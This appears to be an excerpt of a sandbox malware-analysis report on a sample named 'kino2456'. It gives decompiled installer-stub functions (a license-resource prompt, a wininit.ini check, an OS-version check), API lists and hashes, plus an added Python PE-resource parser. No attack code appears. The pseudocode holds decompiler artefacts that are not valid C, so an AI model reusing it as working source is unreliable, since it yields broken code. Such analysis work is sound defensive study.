                                                                                                                                                                                                                                    • Instruction ID: 216e5871b876991a0dfc7124631a1c9448b0db0afedbd5ab51aef38f3438391d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e98f5288984414ade9d308901b4e66c74b77676b6b2a3e72c5b4a602850765a7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B318C31A042289FDF218B11CC04BAAB7B8EB46768F0101ADE949B2140DB709E859F92
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			E00963A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				// License-prompt routine of this module: reads the RCDATA resource named "LICENSE"
				// (E0096468F wraps FindResourceA/SizeofResource/LoadResource/LockResource/memcpy_s/FreeResource),
				// shows it in a dialog unless the text is the literal "<None>", and stores an HRESULT at 0x969124.
				// _t1, _t19 and _t28 are decompiler temporaries that the listing leaves undeclared.
				_t16 = "LICENSE";
				_t1 = E0096468F(_t16, 0, 0) + 1; // 0x1   -- first call with a NULL buffer only returns the resource size
				_t3 = LocalAlloc(0x40, _t1);             // LPTR: fixed, zero-initialised buffer of size + 1
				 *0x968d4c = _t3;                         // global buffer pointer
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0096468F(_t16, _t3, _t28) != 0) { // second call copies the resource into the buffer
						if(lstrcmpA( *0x968d4c, "<None>") == 0) { // "<None>" means: no license screen
							LocalFree( *0x968d4c);
							L9:
							 *0x969124 = 0;                      // S_OK
							return 1;
						}
						_t9 = E00966517(_t19, 0x7d1, 0, E00963100, 0, 0); // loads an RT_DIALOG template and runs DialogBoxIndirectParamA with callback E00963100
						LocalFree( *0x968d4c);
						if(_t9 != 0) {
							goto L9;                             // dialog accepted
						}
						 *0x969124 = 0x800704c7;                 // HRESULT_FROM_WIN32(ERROR_CANCELLED)
						L2:
						return 0;
					}
					E009644B9(0, 0x4b1, 0, 0, 0x10, 0);      // error box: LoadStringA(0x4b1) + MessageBoxA with MB_ICONHAND
					LocalFree( *0x968d4c);
					 *0x969124 = 0x80070714;                  // HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND)
					goto L2;
				}
				E009644B9(0, 0x4b5, 0, 0, 0x10, 0);          // allocation failed: error box with string 0x4b5
				 *0x969124 = E00966285();                     // GetLastError()
				goto L2;
			}

Instruction addresses of the listing above, in source-line order (placeholder entries for labels and braces dropped): 0x00963a46, 0x00963a57, 0x00963a5d, 0x00963a63, 0x00963a6a, 0x00963a91, 0x00963a9a, 0x00963ad8, 0x00963b13, 0x00963b19, 0x00963b1b, 0x00963b21, 0x00963ae7, 0x00963af4, 0x00963afc, 0x00963afe, 0x00963a87, 0x00963a87, 0x00963aa8, 0x00963ab3, 0x00963ab9, 0x00963ab9, 0x00963a78, 0x00963a82

APIs
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
  • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
  • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
  • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
  • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
  • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00962F64,?,00000002,00000000), ref: 00963A5D
• LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00963AB3
  • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
  • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
  • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
• lstrcmpA.KERNEL32(<None>,00000000), ref: 00963AD0
• LocalFree.KERNEL32 ref: 00963B13
  • Part of subcall function 00966517: FindResourceA.KERNEL32(00960000,000007D6,00000005), ref: 0096652A
  • Part of subcall function 00966517: LoadResource.KERNEL32(00960000,00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00966538
  • Part of subcall function 00966517: DialogBoxIndirectParamA.USER32(00960000,00000000,00000547,009619E0,00000000), ref: 00966557
  • Part of subcall function 00966517: FreeResource.KERNEL32(00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00966560
• LocalFree.KERNEL32(00000000,00963100,00000000,00000000), ref: 00963AF4
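The FindResourceA/SizeofResource/LoadResource/LockResource chain recorded above is the loader-side lookup of a named RT_RCDATA resource (type 0x0A), and the C-code shows what the stub does with the result. The Python below is an added example, not code from the report or from the analysed sample: it builds a constructed .rsrc section so it runs offline, walks it the way FindResourceA does (type directory, then name directory, then language directory, then the data entry), and replays the LICENSE / "<None>" decision of E00963A3F. The names build_rsrc, find_resource and license_decision, the section RVA 0x9000, and the resource strings are assumptions made for the example.

```python
"""Static lookup of named RT_RCDATA resources in a PE .rsrc section.
Added example, not code from the report or from the sample; the resource
section bytes are constructed here (build_rsrc) so the script runs offline."""
import struct

RT_RCDATA = 10          # type id seen in FindResourceA(..., TITLE, 0000000A)
NAME_FLAG = 0x80000000  # high bit: entry carries a string name / points to a sub-directory
LOW_MASK = 0x7FFFFFFF
DIR_HDR = "<IIHHHH"     # IMAGE_RESOURCE_DIRECTORY: Characteristics, TimeDateStamp, Major, Minor, NamedEntries, IdEntries
DATA_ENTRY = "<IIII"    # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (RVA), Size, CodePage, Reserved


def build_rsrc(section_rva, rcdata):
    """Construct a .rsrc blob: RT_RCDATA -> each string name -> lang 0x409 -> data.
    The table order is an assumed layout; linkers place them differently but use the same structures."""
    names = sorted(rcdata)                      # named entries are stored sorted
    n = len(names)
    if n == 0:
        raise ValueError("need at least one resource")
    type_off = 16 + 8                           # root directory holds one ID entry (RT_RCDATA)
    lang_offs = [type_off + 16 + 8 * n + 24 * i for i in range(n)]
    entry_offs = [lang_offs[-1] + 24 + 16 * i for i in range(n)]
    cur = entry_offs[-1] + 16
    str_offs = []
    for name in names:
        str_offs.append(cur)
        cur += 2 + 2 * len(name)                # IMAGE_RESOURCE_DIR_STRING_U: u16 length + UTF-16LE chars
    cur = (cur + 3) & ~3
    data_offs = []
    for name in names:
        data_offs.append(cur)
        cur = (cur + len(rcdata[name]) + 3) & ~3
    buf = bytearray(cur)
    struct.pack_into(DIR_HDR, buf, 0, 0, 0, 0, 0, 0, 1)
    struct.pack_into("<II", buf, 16, RT_RCDATA, NAME_FLAG | type_off)
    struct.pack_into(DIR_HDR, buf, type_off, 0, 0, 0, 0, n, 0)
    for i, name in enumerate(names):
        struct.pack_into("<II", buf, type_off + 16 + 8 * i, NAME_FLAG | str_offs[i], NAME_FLAG | lang_offs[i])
        struct.pack_into(DIR_HDR, buf, lang_offs[i], 0, 0, 0, 0, 0, 1)
        struct.pack_into("<II", buf, lang_offs[i] + 16, 0x0409, entry_offs[i])
        struct.pack_into(DATA_ENTRY, buf, entry_offs[i], section_rva + data_offs[i], len(rcdata[name]), 0, 0)
        struct.pack_into("<H", buf, str_offs[i], len(name))
        buf[str_offs[i] + 2:str_offs[i] + 2 + 2 * len(name)] = name.encode("utf-16-le")
        buf[data_offs[i]:data_offs[i] + len(rcdata[name])] = rcdata[name]
    return bytes(buf)


def _read_dir(rsrc, off):
    """Return [(key, target)] for the directory at `off`; key is str for named entries, int for IDs."""
    named, ids = struct.unpack_from(DIR_HDR, rsrc, off)[4:6]
    out = []
    for i in range(named + ids):
        key, target = struct.unpack_from("<II", rsrc, off + 16 + 8 * i)
        if key & NAME_FLAG:
            soff = key & LOW_MASK
            (slen,) = struct.unpack_from("<H", rsrc, soff)
            key = rsrc[soff + 2:soff + 2 + 2 * slen].decode("utf-16-le")
        out.append((key, target))
    return out


def find_resource(rsrc, section_rva, res_type, res_name, lang=None):
    """Walk type -> name -> language like FindResourceA; return the resource bytes or None.
    Names compare case-insensitively, IDs exactly; lang=None takes the first language entry."""
    def lookup(dir_off, wanted):
        for key, target in _read_dir(rsrc, dir_off):
            if isinstance(key, str) and isinstance(wanted, str):
                if key.upper() == wanted.upper():
                    return target
            elif key == wanted:
                return target
        return None

    sub = lookup(0, res_type)
    if sub is None or not sub & NAME_FLAG:
        return None
    sub = lookup(sub & LOW_MASK, res_name)
    if sub is None or not sub & NAME_FLAG:
        return None
    lang_dir = sub & LOW_MASK
    if lang is None:
        entries = _read_dir(rsrc, lang_dir)
        leaf = entries[0][1] if entries else None
    else:
        leaf = lookup(lang_dir, lang)
    if leaf is None or leaf & NAME_FLAG:
        return None
    rva, size = struct.unpack_from(DATA_ENTRY, rsrc, leaf)[:2]
    start = rva - section_rva
    if start < 0 or start + size > len(rsrc):
        return None                             # data entry points outside the section: malformed
    return rsrc[start:start + size]


def license_decision(rsrc, section_rva):
    """Replay E00963A3F: read RCDATA "LICENSE"; unreadable -> ERROR_RESOURCE_DATA_NOT_FOUND,
    literal "<None>" -> skip the dialog, anything else -> show it (dialog outcome not modelled)."""
    data = find_resource(rsrc, section_rva, RT_RCDATA, "LICENSE")
    if data is None:
        return ("error", 0x80070714)            # the HRESULT the stub stores at 0x969124
    text = data.split(b"\0", 1)[0].decode("latin-1")
    if text == "<None>":
        return ("skip", None)
    return ("prompt", text)


if __name__ == "__main__":
    # constructed sample resources, not data from the analysed binary
    rsrc = build_rsrc(0x9000, {"LICENSE": b"Sample license text\0", "TITLE": b"Setup\0"})
    print(find_resource(rsrc, 0x9000, RT_RCDATA, "TITLE"))
    print(license_decision(rsrc, 0x9000))
    print(license_decision(build_rsrc(0x9000, {"LICENSE": b"<None>\0"}), 0x9000))
```

To apply this to the dumped module, carve the .rsrc section out of the dump and pass its VirtualAddress as section_rva; find_resource(..., RT_RCDATA, "TITLE") and "LICENSE" then return the strings the stub loads at runtime without executing it. The bounds check before the final slice matters on real samples: a data entry whose RVA falls outside the section is a common sign of a corrupted or deliberately broken resource table.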
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: 6df482102f0377182e8c725c9a6dfae0f675063b9d9e0af4b85cc57490258883
• Instruction ID: b08931b8f4513fb0c43f945f624b957a367a31c259bdf3c78226618d9d1d629a
• Opcode Fuzzy Hash: 6df482102f0377182e8c725c9a6dfae0f675063b9d9e0af4b85cc57490258883
• Instruction Fuzzy Hash: 0211D670318201BBD720AF72AC19F2739FDDBD6740B11852EF542E61E1DEF98800BA20
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 94%
			E009624E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

                                                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                                                    				_t7 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                    					E0096658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                    			}
Listing addresses (address column of the decompiled function above): 0x009624e0, 0x009624eb, 0x009624f2, 0x009624f7, 0x00962504, 0x0096250e, 0x0096251d, 0x0096252c, 0x00962541, 0x00962546, 0x00962553, 0x00962555, 0x00962555, 0x00962546, 0x0096256c

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00962506
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0096252C
• _lopen.KERNEL32 ref: 0096253B
• _llseek.KERNEL32(00000000,00000000,00000002), ref: 0096254C
• _lclose.KERNEL32(00000000), ref: 00962555
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
• String ID: wininit.ini
• API String ID: 3273605193-4206010578
• Opcode ID: 283df31dedeeebaf51e631189092c6aa64456ab8fbf861a77cd3bcd69456b0c0
• Instruction ID: 77571113f9672bd55ac8d92ebbb5b122eda06657641264e12b29e9fa06938881
• Opcode Fuzzy Hash: 283df31dedeeebaf51e631189092c6aa64456ab8fbf861a77cd3bcd69456b0c0
• Instruction Fuzzy Hash: 9401D4326041286BC720AB65DD0DEDFBB7CEB86760F000159FA49E3190DEB48E45CEA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E009636EE(CHAR* __ecx) {
	signed int _v8;
	char _v268;
	struct _OSVERSIONINFOA _v416;
	signed int _v420;
	signed int _v424;
	CHAR* _v428;
	CHAR* _v432;
	signed int _v436;
	CHAR* _v440;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t72;
	CHAR* _t77;
	CHAR* _t91;
	CHAR* _t94;
	int _t97;
	CHAR* _t98;
	signed char _t99;
	CHAR* _t104;
	signed short _t107;
	signed int _t109;
	short _t113;
	void* _t114;
	signed char _t115;
	short _t119;
	CHAR* _t123;
	CHAR* _t124;
	CHAR* _t129;
	signed int _t131;
	signed int _t132;
	CHAR* _t135;
	CHAR* _t138;
	signed int _t139;

	_t72 =  *0x968004; // 0xf4cc89a0
	_v8 = _t72 ^ _t139;
	_v416.dwOSVersionInfoSize = 0x94;
	_t115 = __ecx;
	_t135 = 0;
	_v432 = __ecx;
	_t138 = 0;
	if(GetVersionExA( &_v416) != 0) {
		_t133 = _v416.dwMajorVersion;
		_t119 = 2;
		_t77 = _v416.dwPlatformId - 1;
		__eflags = _t77;
		if(_t77 == 0) {
			_t119 = 0;
			__eflags = 1;
			 *0x968184 = 1;
			 *0x968180 = 1;
			L13:
			 *0x969a40 = _t119;
			L14:
			__eflags =  *0x968a34 - _t138; // 0x0
			if(__eflags != 0) {
				goto L66;
			}
			__eflags = _t115;
			if(_t115 == 0) {
				goto L66;
			}
			_v428 = _t135;
			__eflags = _t119;
			_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                    							_v436 = E00962A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                    							_t91 = E00962A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                    							_t123 = _v436;
                                                                                                                                                                                                                                    							_t133 = 0x54d;
                                                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                                                    							if(_t123 < 0) {
                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                    								__eflags = _v420 - 1;
                                                                                                                                                                                                                                    								if(_v420 == 1) {
                                                                                                                                                                                                                                    									_t138 = 0x54c;
                                                                                                                                                                                                                                    									L36:
                                                                                                                                                                                                                                    									__eflags = _t138;
                                                                                                                                                                                                                                    									if(_t138 != 0) {
                                                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                                                    										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                    										if(_t138 == _t133) {
                                                                                                                                                                                                                                    											L30:
                                                                                                                                                                                                                                    											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                    											_t115 = 0;
                                                                                                                                                                                                                                    											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                    											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                                    												_t124 = _v440;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                    												_v420 =  &_v268;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t124;
                                                                                                                                                                                                                                    											if(_t124 == 0) {
                                                                                                                                                                                                                                    												_t135 = _v436;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t99 = _t124[0x30];
                                                                                                                                                                                                                                    												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                    												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                    												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                    													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t115 = 0x104;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x968a38 & 0x00000001;
                                                                                                                                                                                                                                    											if(( *0x968a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    												L64:
                                                                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                                                                    												_push(0x30);
                                                                                                                                                                                                                                    												_push(_v420);
                                                                                                                                                                                                                                    												_push("doza2");
                                                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												__eflags = _t135;
                                                                                                                                                                                                                                    												if(_t135 == 0) {
                                                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												__eflags =  *_t135;
                                                                                                                                                                                                                                    												if( *_t135 == 0) {
                                                                                                                                                                                                                                    													goto L64;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												MessageBeep(0);
                                                                                                                                                                                                                                    												_t94 = E0096681F(_t115);
                                                                                                                                                                                                                                    												__eflags = _t94;
                                                                                                                                                                                                                                    												if(_t94 == 0) {
                                                                                                                                                                                                                                    													L57:
                                                                                                                                                                                                                                    													0x180030 = 0x30;
                                                                                                                                                                                                                                    													L58:
                                                                                                                                                                                                                                    													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
                                                                                                                                                                                                                                    													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                    													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                    														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                    														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    															goto L66;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														__eflags = _t97 - 1;
                                                                                                                                                                                                                                    														L62:
                                                                                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                                                                                    															_t138 = 0;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														goto L66;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													__eflags = _t97 - 6;
                                                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t98 = E009667C9(_t124, _t124);
                                                                                                                                                                                                                                    												__eflags = _t98;
                                                                                                                                                                                                                                    												if(_t98 == 0) {
                                                                                                                                                                                                                                    													goto L57;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                    										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										__eflags = _t138;
                                                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                                                    									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E009628E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x969a40 = _t119;
						 *0x968184 = 1;
						 *0x968180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x969a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x968184 = _t135;
							 *0x968180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E009644B9(0, _t138);
					L66:
					return E00966CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}
0x009636f9
0x00963700
0x0096370c
0x00963716
0x00963718
0x0096371b
0x00963721
0x0096372b
0x0096373d
0x00963745
0x00963746
0x00963746
0x00963749
0x009637ab
0x009637ad
0x009637ae
0x009637b3
0x009637b8
0x009637b8
0x009637bf
0x009637bf
0x009637c5
0x00000000
0x00000000
0x009637cb
0x009637cd
0x00000000
0x00000000
                                                                                                                                                                                                                                    0x009637d5
                                                                                                                                                                                                                                    0x009637db
                                                                                                                                                                                                                                    0x009637e8
                                                                                                                                                                                                                                    0x009637ea
                                                                                                                                                                                                                                    0x009637ea
                                                                                                                                                                                                                                    0x009637ea
                                                                                                                                                                                                                                    0x009637f0
                                                                                                                                                                                                                                    0x009637f6
                                                                                                                                                                                                                                    0x00963805
                                                                                                                                                                                                                                    0x00963817
                                                                                                                                                                                                                                    0x0096382b
                                                                                                                                                                                                                                    0x00963830
                                                                                                                                                                                                                                    0x00963836
                                                                                                                                                                                                                                    0x0096383b
                                                                                                                                                                                                                                    0x0096383d
                                                                                                                                                                                                                                    0x009638eb
                                                                                                                                                                                                                                    0x009638eb
                                                                                                                                                                                                                                    0x009638f2
                                                                                                                                                                                                                                    0x0096390c
                                                                                                                                                                                                                                    0x00963911
                                                                                                                                                                                                                                    0x00963911
                                                                                                                                                                                                                                    0x00963913
                                                                                                                                                                                                                                    0x0096394d
                                                                                                                                                                                                                                    0x0096394d
                                                                                                                                                                                                                                    0x0096394f
                                                                                                                                                                                                                                    0x009638a9
                                                                                                                                                                                                                                    0x009638a9
                                                                                                                                                                                                                                    0x009638b0
                                                                                                                                                                                                                                    0x009638b2
                                                                                                                                                                                                                                    0x009638b9
                                                                                                                                                                                                                                    0x009638bb
                                                                                                                                                                                                                                    0x009638c1
                                                                                                                                                                                                                                    0x00963975
                                                                                                                                                                                                                                    0x009638c7
                                                                                                                                                                                                                                    0x009638de
                                                                                                                                                                                                                                    0x009638e0
                                                                                                                                                                                                                                    0x009638e0
                                                                                                                                                                                                                                    0x0096397b
                                                                                                                                                                                                                                    0x0096397d
                                                                                                                                                                                                                                    0x009639a9
                                                                                                                                                                                                                                    0x0096397f
                                                                                                                                                                                                                                    0x00963982
                                                                                                                                                                                                                                    0x0096398b
                                                                                                                                                                                                                                    0x0096398d
                                                                                                                                                                                                                                    0x0096398f
                                                                                                                                                                                                                                    0x0096399f
                                                                                                                                                                                                                                    0x009639a1
                                                                                                                                                                                                                                    0x00963991
                                                                                                                                                                                                                                    0x00963991
                                                                                                                                                                                                                                    0x00963991
                                                                                                                                                                                                                                    0x0096398f
                                                                                                                                                                                                                                    0x009639af
                                                                                                                                                                                                                                    0x009639b6
                                                                                                                                                                                                                                    0x00963a0f
                                                                                                                                                                                                                                    0x00963a0f
                                                                                                                                                                                                                                    0x00963a11
                                                                                                                                                                                                                                    0x00963a13
                                                                                                                                                                                                                                    0x00963a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639b8
                                                                                                                                                                                                                                    0x009639b8
                                                                                                                                                                                                                                    0x009639ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639bc
                                                                                                                                                                                                                                    0x009639bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639c3
                                                                                                                                                                                                                                    0x009639c9
                                                                                                                                                                                                                                    0x009639ce
                                                                                                                                                                                                                                    0x009639d0
                                                                                                                                                                                                                                    0x009639e3
                                                                                                                                                                                                                                    0x009639e5
                                                                                                                                                                                                                                    0x009639e6
                                                                                                                                                                                                                                    0x009639f1
                                                                                                                                                                                                                                    0x009639f7
                                                                                                                                                                                                                                    0x009639fa
                                                                                                                                                                                                                                    0x00963a01
                                                                                                                                                                                                                                    0x00963a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963a06
                                                                                                                                                                                                                                    0x00963a09
                                                                                                                                                                                                                                    0x00963a09
                                                                                                                                                                                                                                    0x00963a0b
                                                                                                                                                                                                                                    0x00963a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963a09
                                                                                                                                                                                                                                    0x009639fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009639fc
                                                                                                                                                                                                                                    0x009639d3
                                                                                                                                                                                                                                    0x009639d8
                                                                                                                                                                                                                                    0x009639da
